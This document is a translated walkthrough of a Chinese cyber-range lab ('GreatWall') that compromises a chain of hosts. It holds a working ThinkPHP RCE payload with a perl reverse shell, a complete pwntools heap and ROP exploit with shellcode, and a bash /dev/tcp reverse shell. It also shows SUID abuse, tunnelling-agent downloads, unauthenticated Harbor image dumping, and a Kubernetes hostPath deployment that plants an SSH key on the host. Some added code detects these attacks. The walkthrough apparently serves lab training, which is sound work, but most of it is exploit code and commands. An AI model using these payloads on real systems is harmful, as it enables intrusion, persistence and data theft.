春秋云境 (Chunqiu Cloud Range) - GreatWall

Entry point: 39.101.76.98

Initial scan:

[2025-03-04 18:33:08] [INFO] brute-force threads: 1
[2025-03-04 18:33:08] [INFO] starting information scan
[2025-03-04 18:33:08] [INFO] final valid host count: 1
[2025-03-04 18:33:08] [INFO] starting host scan
[2025-03-04 18:33:09] [INFO] valid port count: 233
[2025-03-04 18:33:09] [SUCCESS] port open 39.101.76.98:80
[2025-03-04 18:33:09] [SUCCESS] port open 39.101.76.98:22
[2025-03-04 18:33:09] [SUCCESS] service identified 39.101.76.98:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.7 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.7.]
[2025-03-04 18:33:11] [SUCCESS] port open 39.101.76.98:8080
[2025-03-04 18:33:14] [SUCCESS] service identified 39.101.76.98:80 => [http]
[2025-03-04 18:33:14] [SUCCESS] service identified 39.101.76.98:8080 => [http]
[2025-03-04 18:33:16] [INFO] live port count: 3
[2025-03-04 18:33:16] [INFO] starting vulnerability scan
[2025-03-04 18:33:16] [INFO] loaded plugins: ssh, webpoc, webtitle
[2025-03-04 18:33:16] [SUCCESS] web title http://39.101.76.98 status:200 length:10887 title:""
[2025-03-04 18:33:17] [SUCCESS] web title http://39.101.76.98:8080 status:200 length:1027 title:Login Form
[2025-03-04 18:33:35] [SUCCESS] target: http://39.101.76.98:8080
vuln type: poc-yaml-thinkphp5023-method-rce
vuln name: poc2
details:
links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce

ThinkPHP 5.0.23 RCE


POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

Reverse shell (same request, the command is a percent-encoded perl one-liner):

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif%28%24p%29%3B%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET%28PeerAddr%2C%221xxx8%3A8088%22%29%3BSTDIN-%3Efdopen%28%24c%2Cr%29%3B%24~-%3Efdopen%28%24c%2Cw%29%3Bsystem%24_%20while%3C%3E%3B%27

Then bring the host online in vshell with one click.
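The same `_method` override request, as an added example that is not part of the original post or of vulhub: `build_body()` reproduces the page's payload (for `id` it yields the exact 72-byte body above, and percent-encoding the command is how the reverse-shell body was produced), `check_target()` is this example's own probe wrapper against a placeholder URL, and `is_method_rce()` is the detection-side check a WAF or request log parser would run over the POST body.

```python
"""ThinkPHP 5.0.23 `_method` override RCE: build the request body used above,
probe a target with it, and recognise the same body in request logs.

Added example; build_body() reproduces the page's payload exactly, check_target()
and is_method_rce() are this example's own helpers, the target URL is a placeholder."""
import re
import sys
import urllib.parse
import urllib.request

VULN_PATH = "/index.php?s=captcha"   # route used by the request on this page

# PHP callables a `filter[]` value has to name for the override to become code execution
SHELL_FUNCS = {"system", "exec", "passthru", "shell_exec", "popen", "proc_open", "assert"}


def build_body(cmd):
    """Form body that makes ThinkPHP 5.0.23 run system(cmd).
    Parameter names are left raw (as in the page's request); only the command is
    percent-encoded, which is how the reverse-shell body above was produced."""
    fields = [
        ("_method", "__construct"),
        ("filter[]", "system"),
        ("method", "get"),
        ("server[REQUEST_METHOD]", cmd),
    ]
    return "&".join(f"{k}={urllib.parse.quote(v, safe='')}" for k, v in fields)


def check_target(base_url, timeout=10):
    """Send the `id` probe and report whether the response carries a uid= line.
    Network call against a placeholder target; not exercised offline."""
    req = urllib.request.Request(
        base_url.rstrip("/") + VULN_PATH,
        data=build_body("id").encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return re.search(rb"uid=\d+\(", resp.read()) is not None


def is_method_rce(body):
    """Detection side: True when a POST body carries _method=__construct together with
    a filter[] naming a shell function. parse_qs decodes percent-encoded keys, so
    filter%5B%5D=system is caught as well as filter[]=system."""
    q = urllib.parse.parse_qs(body, keep_blank_values=True)
    if q.get("_method") != ["__construct"]:
        return False
    return any(k.startswith("filter") and SHELL_FUNCS & set(v) for k, v in q.items())


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080"   # placeholder
    print("vulnerable" if check_target(target) else "not vulnerable")
```

The detector keys on the parameter semantics rather than on `s=captcha`, since any route that reaches `Request::method()` with the `var_method` override enabled is reachable the same way; a body that sets `_method=__construct` from the outside has no legitimate use and is worth alerting on by itself.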

PWN

The 172 segment:

[2025-03-04 18:47:07] [INFO] brute-force threads: 1
[2025-03-04 18:47:07] [INFO] starting information scan
[2025-03-04 18:47:07] [INFO] CIDR range: 172.28.23.0-172.28.23.255
[2025-03-04 18:47:07] [INFO] generated IP range: 172.28.23.0.%!d(string=172.28.23.255) - %!s(MISSING).%!d(MISSING)
[2025-03-04 18:47:07] [INFO] parsed CIDR 172.28.23.17/24 -> IP range 172.28.23.0-172.28.23.255
[2025-03-04 18:47:07] [INFO] final valid host count: 256
[2025-03-04 18:47:07] [INFO] starting host scan
[2025-03-04 18:47:07] [INFO] trying listener-less ICMP probing...
[2025-03-04 18:47:07] [INFO] current user lacks the privilege to send ICMP packets
[2025-03-04 18:47:07] [INFO] switching to ping-based probing...
[2025-03-04 18:47:07] [SUCCESS] target 172.28.23.26 alive (ICMP)
[2025-03-04 18:47:07] [SUCCESS] target 172.28.23.17 alive (ICMP)
[2025-03-04 18:47:07] [SUCCESS] target 172.28.23.33 alive (ICMP)
[2025-03-04 18:47:13] [INFO] live host count: 3
[2025-03-04 18:47:13] [INFO] valid port count: 233
[2025-03-04 18:47:13] [SUCCESS] port open 172.28.23.33:22
[2025-03-04 18:47:13] [SUCCESS] port open 172.28.23.26:22
[2025-03-04 18:47:13] [SUCCESS] port open 172.28.23.26:21
[2025-03-04 18:47:13] [SUCCESS] port open 172.28.23.17:22
[2025-03-04 18:47:13] [SUCCESS] port open 172.28.23.26:80
[2025-03-04 18:47:13] [SUCCESS] port open 172.28.23.17:80
[2025-03-04 18:47:13] [SUCCESS] port open 172.28.23.17:8080
[2025-03-04 18:47:13] [SUCCESS] port open 172.28.23.33:8080
[2025-03-04 18:47:13] [SUCCESS] service identified 172.28.23.33:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.10 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.10.]
[2025-03-04 18:47:13] [SUCCESS] service identified 172.28.23.26:22 => [ssh] version:7.2p2 Ubuntu 4ubuntu2.10 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10.]
[2025-03-04 18:47:13] [SUCCESS] service identified 172.28.23.26:21 => [ftp] version:3.0.3 product:vsftpd os:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-03-04 18:47:13] [SUCCESS] service identified 172.28.23.17:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.7 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.7.]
[2025-03-04 18:47:19] [SUCCESS] service identified 172.28.23.17:8080 => [http]
[2025-03-04 18:47:19] [SUCCESS] service identified 172.28.23.33:8080 => [http]
[2025-03-04 18:47:20] [SUCCESS] service identified 172.28.23.17:80 => [http]
[2025-03-04 18:47:20] [SUCCESS] service identified 172.28.23.26:80 => [http]
[2025-03-04 18:47:20] [INFO] live port count: 8
[2025-03-04 18:47:20] [INFO] starting vulnerability scan
[2025-03-04 18:47:20] [INFO] loaded plugins: ftp, ssh, webpoc, webtitle
[2025-03-04 18:47:20] [SUCCESS] web title http://172.28.23.17 status:200 length:10887 title:""
[2025-03-04 18:47:20] [SUCCESS] web title http://172.28.23.17:8080 status:200 length:1027 title:Login Form
[2025-03-04 18:47:20] [SUCCESS] web title http://172.28.23.26 status:200 length:13693 title:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[2025-03-04 18:47:20] [SUCCESS] anonymous login succeeded!
[2025-03-04 18:47:20] [SUCCESS] web title http://172.28.23.33:8080 status:302 length:0 title:(none) redirect: http://172.28.23.33:8080/login;jsessionid=F926A750A2597E0C56DBD301AA0F75E5
[2025-03-04 18:47:21] [SUCCESS] web title http://172.28.23.33:8080/login;jsessionid=F926A750A2597E0C56DBD301AA0F75E5 status:200 length:3860 title:智联科技 ERP 后台登陆
[2025-03-04 18:47:21] [SUCCESS] target: http://172.28.23.17:8080
vuln type: poc-yaml-thinkphp5023-method-rce
vuln name: poc1
details:
links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
[2025-03-04 18:47:22] [SUCCESS] target: http://172.28.23.33:8080
vuln type: poc-yaml-spring-actuator-heapdump-file
vuln name:
details:
author:AgeloVito
links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-03-04 18:47:22] [SUCCESS] target: http://172.28.23.33:8080
vuln type: poc-yaml-springboot-env-unauth
vuln name: spring2
details:
links:https://github.com/LandGrey/SpringBootVulExploit

The Spring Boot actuator heapdump is exposed; pull up a tunnel to reach it, then dump it. The heap contains the Shiro rememberMe key:

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES

With the key, use Godzilla to plant an in-memory shell, connect, and download HashNote. The exploit script below is 大头's.

from pwn import *

elf = ELF('./HashNote')
context(arch=elf.arch, os='linux', log_level='debug')
# p = process('./HashNote')

p = remote('172.28.23.33', 59696)


def send_command(command):
    p.sendlineafter(b': ', str(command).encode())


def add_entry(key, value):
    send_command(1)
    p.sendlineafter(b'Key: ', key)
    p.sendlineafter(b'Data: ', value)


def get_entry(key):
    send_command(2)
    p.sendlineafter(b'Key: ', key)


def update_entry(key, value):
    send_command(3)
    p.sendlineafter(b'Key: ', key)
    p.sendlineafter(b'Data: ', value)


def set_username(value):
    send_command(4)
    p.sendafter(b'New username: ', value)


p.sendlineafter(b'Username: ', b'123')
p.sendlineafter(b'Password: ', b'freep@ssw0rd:3')

# Seed two entries (keys as in the original script).
add_entry(b'aabP', b'aaaaaaaa')
add_entry(b'aace', b'C' * 0xc0)

# execve("//bin/sh", ["//bin/sh"], NULL); this ends up inside the username buffer
sc = [
    b'\x6a\x3b',                                   # push 0x3b
    b'\x58',                                       # pop rax
    b'\x99',                                       # cdq
    b'\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68',   # movabs rbx, 0x68732f6e69622f2f ("//bin/sh")
    b'\x53',                                       # push rbx
    b'\x48\x89\xe7',                               # mov rdi, rsp
    b'\x52',                                       # push rdx
    b'\x57',                                       # push rdi
    b'\x48\x89\xe6',                               # mov rsi, rsp
    b'\x0f\x05',                                   # syscall
]
shellcode = b''.join(sc)
username_addr = 0x5dc980              # static address of the username buffer (no PIE)
fake_obj_addr = username_addr + 0x10  # fake note object is built inside the username buffer


def build_username(addr, length):
    # [0x00] pointer to the fake object, [0x08] junk, [0x10] fake object, [0x48] shellcode
    payload = p64(fake_obj_addr) + p64(0xdeadbeef)
    payload += p64(fake_obj_addr + 0x10) + p64(4)      # key pointer, key length
    payload += b'aahO'.ljust(0x10, b'\x00')            # inline key
    payload += p64(addr) + p64(length) + b'aaaaaaaa'   # data pointer, data length
    payload += shellcode                               # lands at username_addr + 0x48
    return payload.ljust(128, b'\x00')


# Arbitrary read/write primitives: the fake entry's data pointer is whatever we choose.
def arbitrary_read(addr):
    set_username(build_username(addr, 8))
    get_entry(b'aahO')               # prints 8 bytes from addr


def arbitrary_write(addr, data):
    set_username(build_username(addr, len(data)))
    update_entry(b'aahO', data)      # copies len(data) bytes to addr


# Leak a stack address through libc's environ pointer.
environ = 0x5e4c38
arbitrary_read(environ)
stack_addr = u64(p.recvuntil(b'\x7f', drop=False)[-6:].ljust(8, b'\0'))
success('stack_addr: %#x' % stack_addr)

# Gadgets from the static binary (addresses from the original script; roles inferred from use)
rdi = 0x0000000000405e7c          # pop rdi; ret
rsi = 0x000000000040974f          # pop rsi; ret
rax = 0x00000000004206ba          # pop rax; ret
rdx_rbx = 0x000000000053514b      # pop rdx; pop rbx; ret
shr_eax_2 = 0x0000000000523f2e    # shr eax, 2; ret
syscall_ret = 0x00000000004d9776  # syscall; ret

# mprotect(page(username_addr), 0x1000, RWX) via syscall 10, then return into the shellcode.
# rax is loaded as 0x28 and shifted right by 2, presumably to keep a raw 0x0a (newline)
# byte out of line-based input.
payload = p64(rdi) + p64(username_addr & ~0xfff)
payload += p64(rsi) + p64(0x1000)
payload += p64(rdx_rbx) + p64(7) + p64(0)
payload += p64(rax) + p64(0xa << 2) + p64(shr_eax_2)
payload += p64(syscall_ret) + p64(username_addr + 0x48)

# Overwrite the return address slot (offset from the original script) with the chain.
arbitrary_write(stack_addr - 0x210, payload)
p.sendline(b'uname -ar')

p.interactive()

disable_functions bypass / SUID privilege escalation

The FTP part has a pitfall.

I don't know why it doesn't work locally.

http://172.28.23.26/uploadbase64.php
imgbase64=%2B

disable_functions is set; bypass it with the AntSword plugin.

A POST-based webshell cannot be used here; upload a GET-based one and then edit .antproxy.php to point at the GET shell.

Run it.

No permission to read the flag, so SUID privilege escalation is needed. Enumerate SUID binaries:

2
find / -xdev -type f -perm /4000 -exec ls -al {} \; 2> /dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/fusermount /bin/ping6 /bin/mount /bin/su /bin/ping /bin/umount /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/at /usr/bin/staprun /usr/bin/base32 /usr/bin/passwd /usr/bin/chsh /usr/bin/sudo /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/s-nail/s-nail-privsep

base32 is SUID, so it can be used to read the flag.

http://172.28.23.26/upload/.antproxy.php?1=system("base32 /fla* | base32 --decode");

Harbor unauthorized access

gost was used to forward traffic so the shell could be bounced out, then Stowaway to link this host with the earlier node.

./gost -L tcp://:18080/1xxx68:8096

http://172.28.23.26/upload/.antproxy.php?1=system(%22bash%20-c%20%5C%22%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.28.23.17%2F18080%200%3E%261%5C%22%22)%3B

stowaway

./linux_x64_agent -c 1xxx8:8096 -s 1234 --reconnect 8
curl http://172.28.23.17:7779/linux_x64_agent -o /tmp/linux_x64_agent

Run fscan:

[2025-03-04 21:29:51] [HOST] target:172.22.14.6 status:alive details:protocol=ICMP
[2025-03-04 21:29:51] [HOST] target:172.22.14.37 status:alive details:protocol=ICMP
[2025-03-04 21:29:51] [HOST] target:172.22.14.46 status:alive details:protocol=ICMP
[2025-03-04 21:29:57] [PORT] target:172.22.14.46 status:open details:port=22
[2025-03-04 21:29:57] [SERVICE] target:172.22.14.46 status:identified details:os=Linux, info=Ubuntu Linux; protocol 2.0, banner=SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.11., port=22, service=ssh, version=8.2p1 Ubuntu 4ubuntu0.11, product=OpenSSH
[2025-03-04 21:29:57] [PORT] target:172.22.14.6 status:open details:port=80
[2025-03-04 21:29:57] [PORT] target:172.22.14.37 status:open details:port=22
[2025-03-04 21:29:57] [SERVICE] target:172.22.14.37 status:identified details:os=Linux, info=Ubuntu Linux; protocol 2.0, banner=SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7., port=22, service=ssh, version=7.6p1 Ubuntu 4ubuntu0.7, product=OpenSSH
[2025-03-04 21:29:57] [PORT] target:172.22.14.6 status:open details:port=22
[2025-03-04 21:29:57] [SERVICE] target:172.22.14.6 status:identified details:banner=SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10., port=22, service=ssh, version=7.2p2 Ubuntu 4ubuntu2.10, product=OpenSSH, os=Linux, info=Ubuntu Linux; protocol 2.0
[2025-03-04 21:29:57] [PORT] target:172.22.14.6 status:open details:port=21
[2025-03-04 21:29:57] [SERVICE] target:172.22.14.6 status:identified details:port=21, service=ftp, version=3.0.3, product=vsftpd, os=Unix, banner=220 (vsFTPd 3.0.3).
[2025-03-04 21:29:57] [PORT] target:172.22.14.46 status:open details:port=80
[2025-03-04 21:30:02] [SERVICE] target:172.22.14.46 status:identified details:port=80, service=http, product=nginx
[2025-03-04 21:30:03] [SERVICE] target:172.22.14.6 status:identified details:port=80, service=http
[2025-03-04 21:30:03] [SERVICE] target:172.22.14.46 status:identified details:url=http://172.22.14.46, status_code=200, length=785, server_info=map[accept-ranges:bytes cache-control:no-store, no-cache, must-revalidate content-length:785 content-security-policy:frame-ancestors 'none' content-type:text/html date:Tue, 04 Mar 2025 13:30:03 GMT etag:"65f177f2-311" last-modified:Wed, 13 Mar 2024 09:54:58 GMT length:785 server:nginx status_code:200 title:Harbor x-frame-options:DENY], fingerprints=[], port=80, service=http, title=Harbor
[2025-03-04 21:30:03] [SERVICE] target:172.22.14.6 status:identified details:length=13693, server_info=map[content-type:text/html;charset=utf-8 date:Tue, 04 Mar 2025 13:30:03 GMT length:13693 server:Apache/2.4.18 (Ubuntu) status_code:200 title:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413 vary:Accept-Encoding], fingerprints=[], port=80, service=http, title=新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413, url=http://172.22.14.6, status_code=200
[2025-03-04 21:30:03] [VULN] target:172.22.14.6 status:vulnerable details:username=anonymous, password=, type=anonymous-login, directories=[OASystem.zip], port=21, service=ftp

CVE-2022-46463

Harbor unauthorized access

GitHub: 404tk/CVE-2022-46463 (harbor unauthorized detection)

Download the images:

python .\harbor.py http://172.22.14.46/ --dump harbor/secret --v2
cd ./caches/harbor_secret/latest/413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49
cat f1ag05_Yz1o.txt
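What harbor.py automates here is a walk of the Docker Registry v2 HTTP API behind Harbor with no token attached: list repositories, list tags, fetch the manifest, then fetch each layer blob by digest. The following is an added example of that walk, not the 404tk tool's code and not Harbor's; `http_get` sends real unauthenticated requests, while `fake_registry()` is a constructed in-memory registry (placeholder host `harbor.example`, repo `harbor/secret` as on this page) so the logic can be exercised offline. If `/v2/_catalog` is not reachable, pass repository names you already know from the Harbor UI.

```python
"""Pull an image's layers from a Docker Registry v2 API (what Harbor fronts) without credentials.
Added example; not the harbor.py tool's code. The registry served by fake_registry() is constructed."""
import hashlib
import json
import os
import sys
import urllib.request

MANIFEST_V2 = "application/vnd.docker.distribution.manifest.v2+json"


def http_get(url, accept=None, timeout=30):
    """Plain GET with no Authorization header: the whole point is that none is required."""
    req = urllib.request.Request(url, headers={"Accept": accept} if accept else {})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


def list_repositories(base, fetch=http_get):
    return json.loads(fetch(f"{base}/v2/_catalog")).get("repositories", [])


def list_tags(base, repo, fetch=http_get):
    return json.loads(fetch(f"{base}/v2/{repo}/tags/list")).get("tags") or []


def pull_layers(base, repo, ref, fetch=http_get):
    """Fetch the schema-2 manifest for repo:ref and every layer blob it lists.
    Each blob is verified against its sha256 digest; returns [(digest, bytes), ...]."""
    manifest = json.loads(fetch(f"{base}/v2/{repo}/manifests/{ref}", MANIFEST_V2))
    if manifest.get("schemaVersion") != 2:
        raise ValueError("expected a schemaVersion 2 manifest")
    layers = []
    for layer in manifest["layers"]:
        digest = layer["digest"]
        algo, _, hexdigest = digest.partition(":")
        blob = fetch(f"{base}/v2/{repo}/blobs/{digest}")
        if algo != "sha256" or hashlib.sha256(blob).hexdigest() != hexdigest:
            raise ValueError(f"digest mismatch for {digest}")
        layers.append((digest, blob))
    return layers


def save_layers(layers, out_dir):
    """Write each layer as <hexdigest>.tar.gz; extract them in order to rebuild the rootfs."""
    os.makedirs(out_dir, exist_ok=True)
    paths = []
    for digest, blob in layers:
        path = os.path.join(out_dir, digest.split(":", 1)[1] + ".tar.gz")
        with open(path, "wb") as fh:
            fh.write(blob)
        paths.append(path)
    return paths


def fake_registry(base="http://harbor.example"):
    """Constructed sample registry: one repo, one tag, one layer. Returns a fetch() stand-in."""
    layer = b"constructed layer bytes (stand-in for a gzipped tar)"
    digest = "sha256:" + hashlib.sha256(layer).hexdigest()
    config = b'{"architecture": "amd64"}'
    config_digest = "sha256:" + hashlib.sha256(config).hexdigest()
    manifest = {
        "schemaVersion": 2, "mediaType": MANIFEST_V2,
        "config": {"mediaType": "application/vnd.docker.container.image.v1+json",
                   "size": len(config), "digest": config_digest},
        "layers": [{"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
                    "size": len(layer), "digest": digest}],
    }
    routes = {
        f"{base}/v2/_catalog": json.dumps({"repositories": ["harbor/secret"]}).encode(),
        f"{base}/v2/harbor/secret/tags/list": json.dumps({"name": "harbor/secret", "tags": ["latest"]}).encode(),
        f"{base}/v2/harbor/secret/manifests/latest": json.dumps(manifest).encode(),
        f"{base}/v2/harbor/secret/blobs/{digest}": layer,
        f"{base}/v2/harbor/secret/blobs/{config_digest}": config,
    }

    def fetch(url, accept=None, timeout=30):
        if url not in routes:
            raise FileNotFoundError(url)
        return routes[url]
    return fetch


if __name__ == "__main__":
    # usage: python registry_pull.py http://172.22.14.46 harbor/secret latest ./caches
    base, repo, ref, out = sys.argv[1:5]
    print(save_layers(pull_layers(base.rstrip("/"), repo, ref), out))
```

The digest check matters on a hostile or flaky network as much as on a CTF range: a registry (or a proxy in front of it) can hand back any bytes for a blob, and only the content-addressed digest in the manifest ties what you extract to what the image author pushed.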

Then pull project_projectadmin as well; its run.sh runs ProjectAdmin-0.0.1-SNAPSHOT.jar:

caches\project_projectadmin\latest\ae0fa683fb6d89fd06e238876769e2c7897d86d7546a4877a2a4d2929ed56f2c\app\ProjectAdmin-0.0.1-SNAPSHOT.jar

Decompiling the jar reveals the database credentials; connect and use MDUT.

mdut-extend doesn't work for this one, but the original version does, which is odd.

K8S

k8s-api-server

This last environment was broken; it had problems every time I tried.

Write an evil-deployment.yaml that mounts the host's root directory at /mnt inside the container:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.8
        volumeMounts:
        - mountPath: /mnt
          name: test-volume
      volumes:
      - name: test-volume
        hostPath:
          path: /

Create the pod, get its name, exec into it, and write an SSH public key into the host's authorized_keys through /mnt. Then SSH in. The flag is in the database and is base-encoded; decode it.

kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f evil-deployment.yaml
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-7pzlq /bin/bash
echo "ssh-rsa AAAxx= root@kali" > /mnt/root/.ssh/authorized_keys
ssh -i /home/kali/.ssh/id_rsa root@172.22.14.37
use flaghaha;
select * from flag04;
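The defender's side of the deployment above, as an added example (not from the original post): an audit over a Kubernetes manifest that flags the escape vectors it relies on, a `hostPath` of `/` mounted read-write, plus the neighbouring ones (privileged containers, host PID/network/IPC namespaces). `EVIL_DEPLOYMENT` is the page's YAML re-typed as a dict so the check runs without a YAML library; the path list and severity labels are this example's own.

```python
"""Audit a Kubernetes manifest for the host-escape vectors the deployment above uses.
Added example; EVIL_DEPLOYMENT is the page's evil-deployment.yaml as a dict (constructed input),
SENSITIVE_HOST_PATHS and the HIGH/MEDIUM labels are this example's own choices."""

SENSITIVE_HOST_PATHS = (
    "/etc", "/root", "/home", "/proc", "/sys", "/var/lib/kubelet",
    "/var/run/docker.sock", "/run/containerd", "/var/run/crio",
)


def is_sensitive_host_path(path):
    """'/' (the whole node filesystem) or anything under a path that yields root on the node."""
    norm = path.rstrip("/") or "/"
    if norm == "/":
        return True
    return any(norm == s or norm.startswith(s + "/") for s in SENSITIVE_HOST_PATHS)


def pod_spec_of(manifest):
    """PodSpec of a bare Pod, or of the pod template inside a Deployment/Job/DaemonSet/..."""
    spec = manifest.get("spec") or {}
    if manifest.get("kind") == "Pod":
        return spec
    return (spec.get("template") or {}).get("spec") or {}


def audit_pod_spec(manifest):
    """One finding string per escape vector: host namespaces, privileged containers,
    and hostPath mounts (HIGH when the path gives node root, MEDIUM otherwise)."""
    spec = pod_spec_of(manifest)
    name = (manifest.get("metadata") or {}).get("name", "<unnamed>")
    findings = []
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            findings.append(f"HIGH {name}: {flag}=true")
    host_paths = {v["name"]: (v.get("hostPath") or {}).get("path", "")
                  for v in spec.get("volumes") or [] if v.get("hostPath")}
    for c in (spec.get("initContainers") or []) + (spec.get("containers") or []):
        cname = c.get("name", "?")
        if (c.get("securityContext") or {}).get("privileged"):
            findings.append(f"HIGH {name}/{cname}: privileged container")
        for m in c.get("volumeMounts") or []:
            path = host_paths.get(m.get("name"))
            if path is None:
                continue                      # not a hostPath volume
            mode = "read-only" if m.get("readOnly") else "read-write"
            sev = "HIGH" if is_sensitive_host_path(path) else "MEDIUM"
            findings.append(f"{sev} {name}/{cname}: hostPath {path} mounted at {m.get('mountPath')} ({mode})")
    return findings


EVIL_DEPLOYMENT = {  # the page's evil-deployment.yaml, as a dict
    "apiVersion": "apps/v1",
    "kind": "Deployment",
    "metadata": {"name": "nginx-deployment", "labels": {"app": "nginx"}},
    "spec": {
        "replicas": 1,
        "selector": {"matchLabels": {"app": "nginx"}},
        "template": {
            "metadata": {"labels": {"app": "nginx"}},
            "spec": {
                "containers": [{
                    "name": "nginx",
                    "image": "nginx:1.8",
                    "volumeMounts": [{"mountPath": "/mnt", "name": "test-volume"}],
                }],
                "volumes": [{"name": "test-volume", "hostPath": {"path": "/"}}],
            },
        },
    },
}

if __name__ == "__main__":
    for line in audit_pod_spec(EVIL_DEPLOYMENT):
        print(line)
```

Run against the page's deployment this reports `HIGH nginx-deployment/nginx: hostPath / mounted at /mnt (read-write)`. The Pod Security Standards "baseline" profile forbids hostPath volumes entirely, so enforcing it with Pod Security Admission on the namespace stops this manifest at admission; the audit above is for manifests already sitting in git or already applied, and for clusters where the API server itself accepts unauthenticated `apply`, which is the real root cause in this environment.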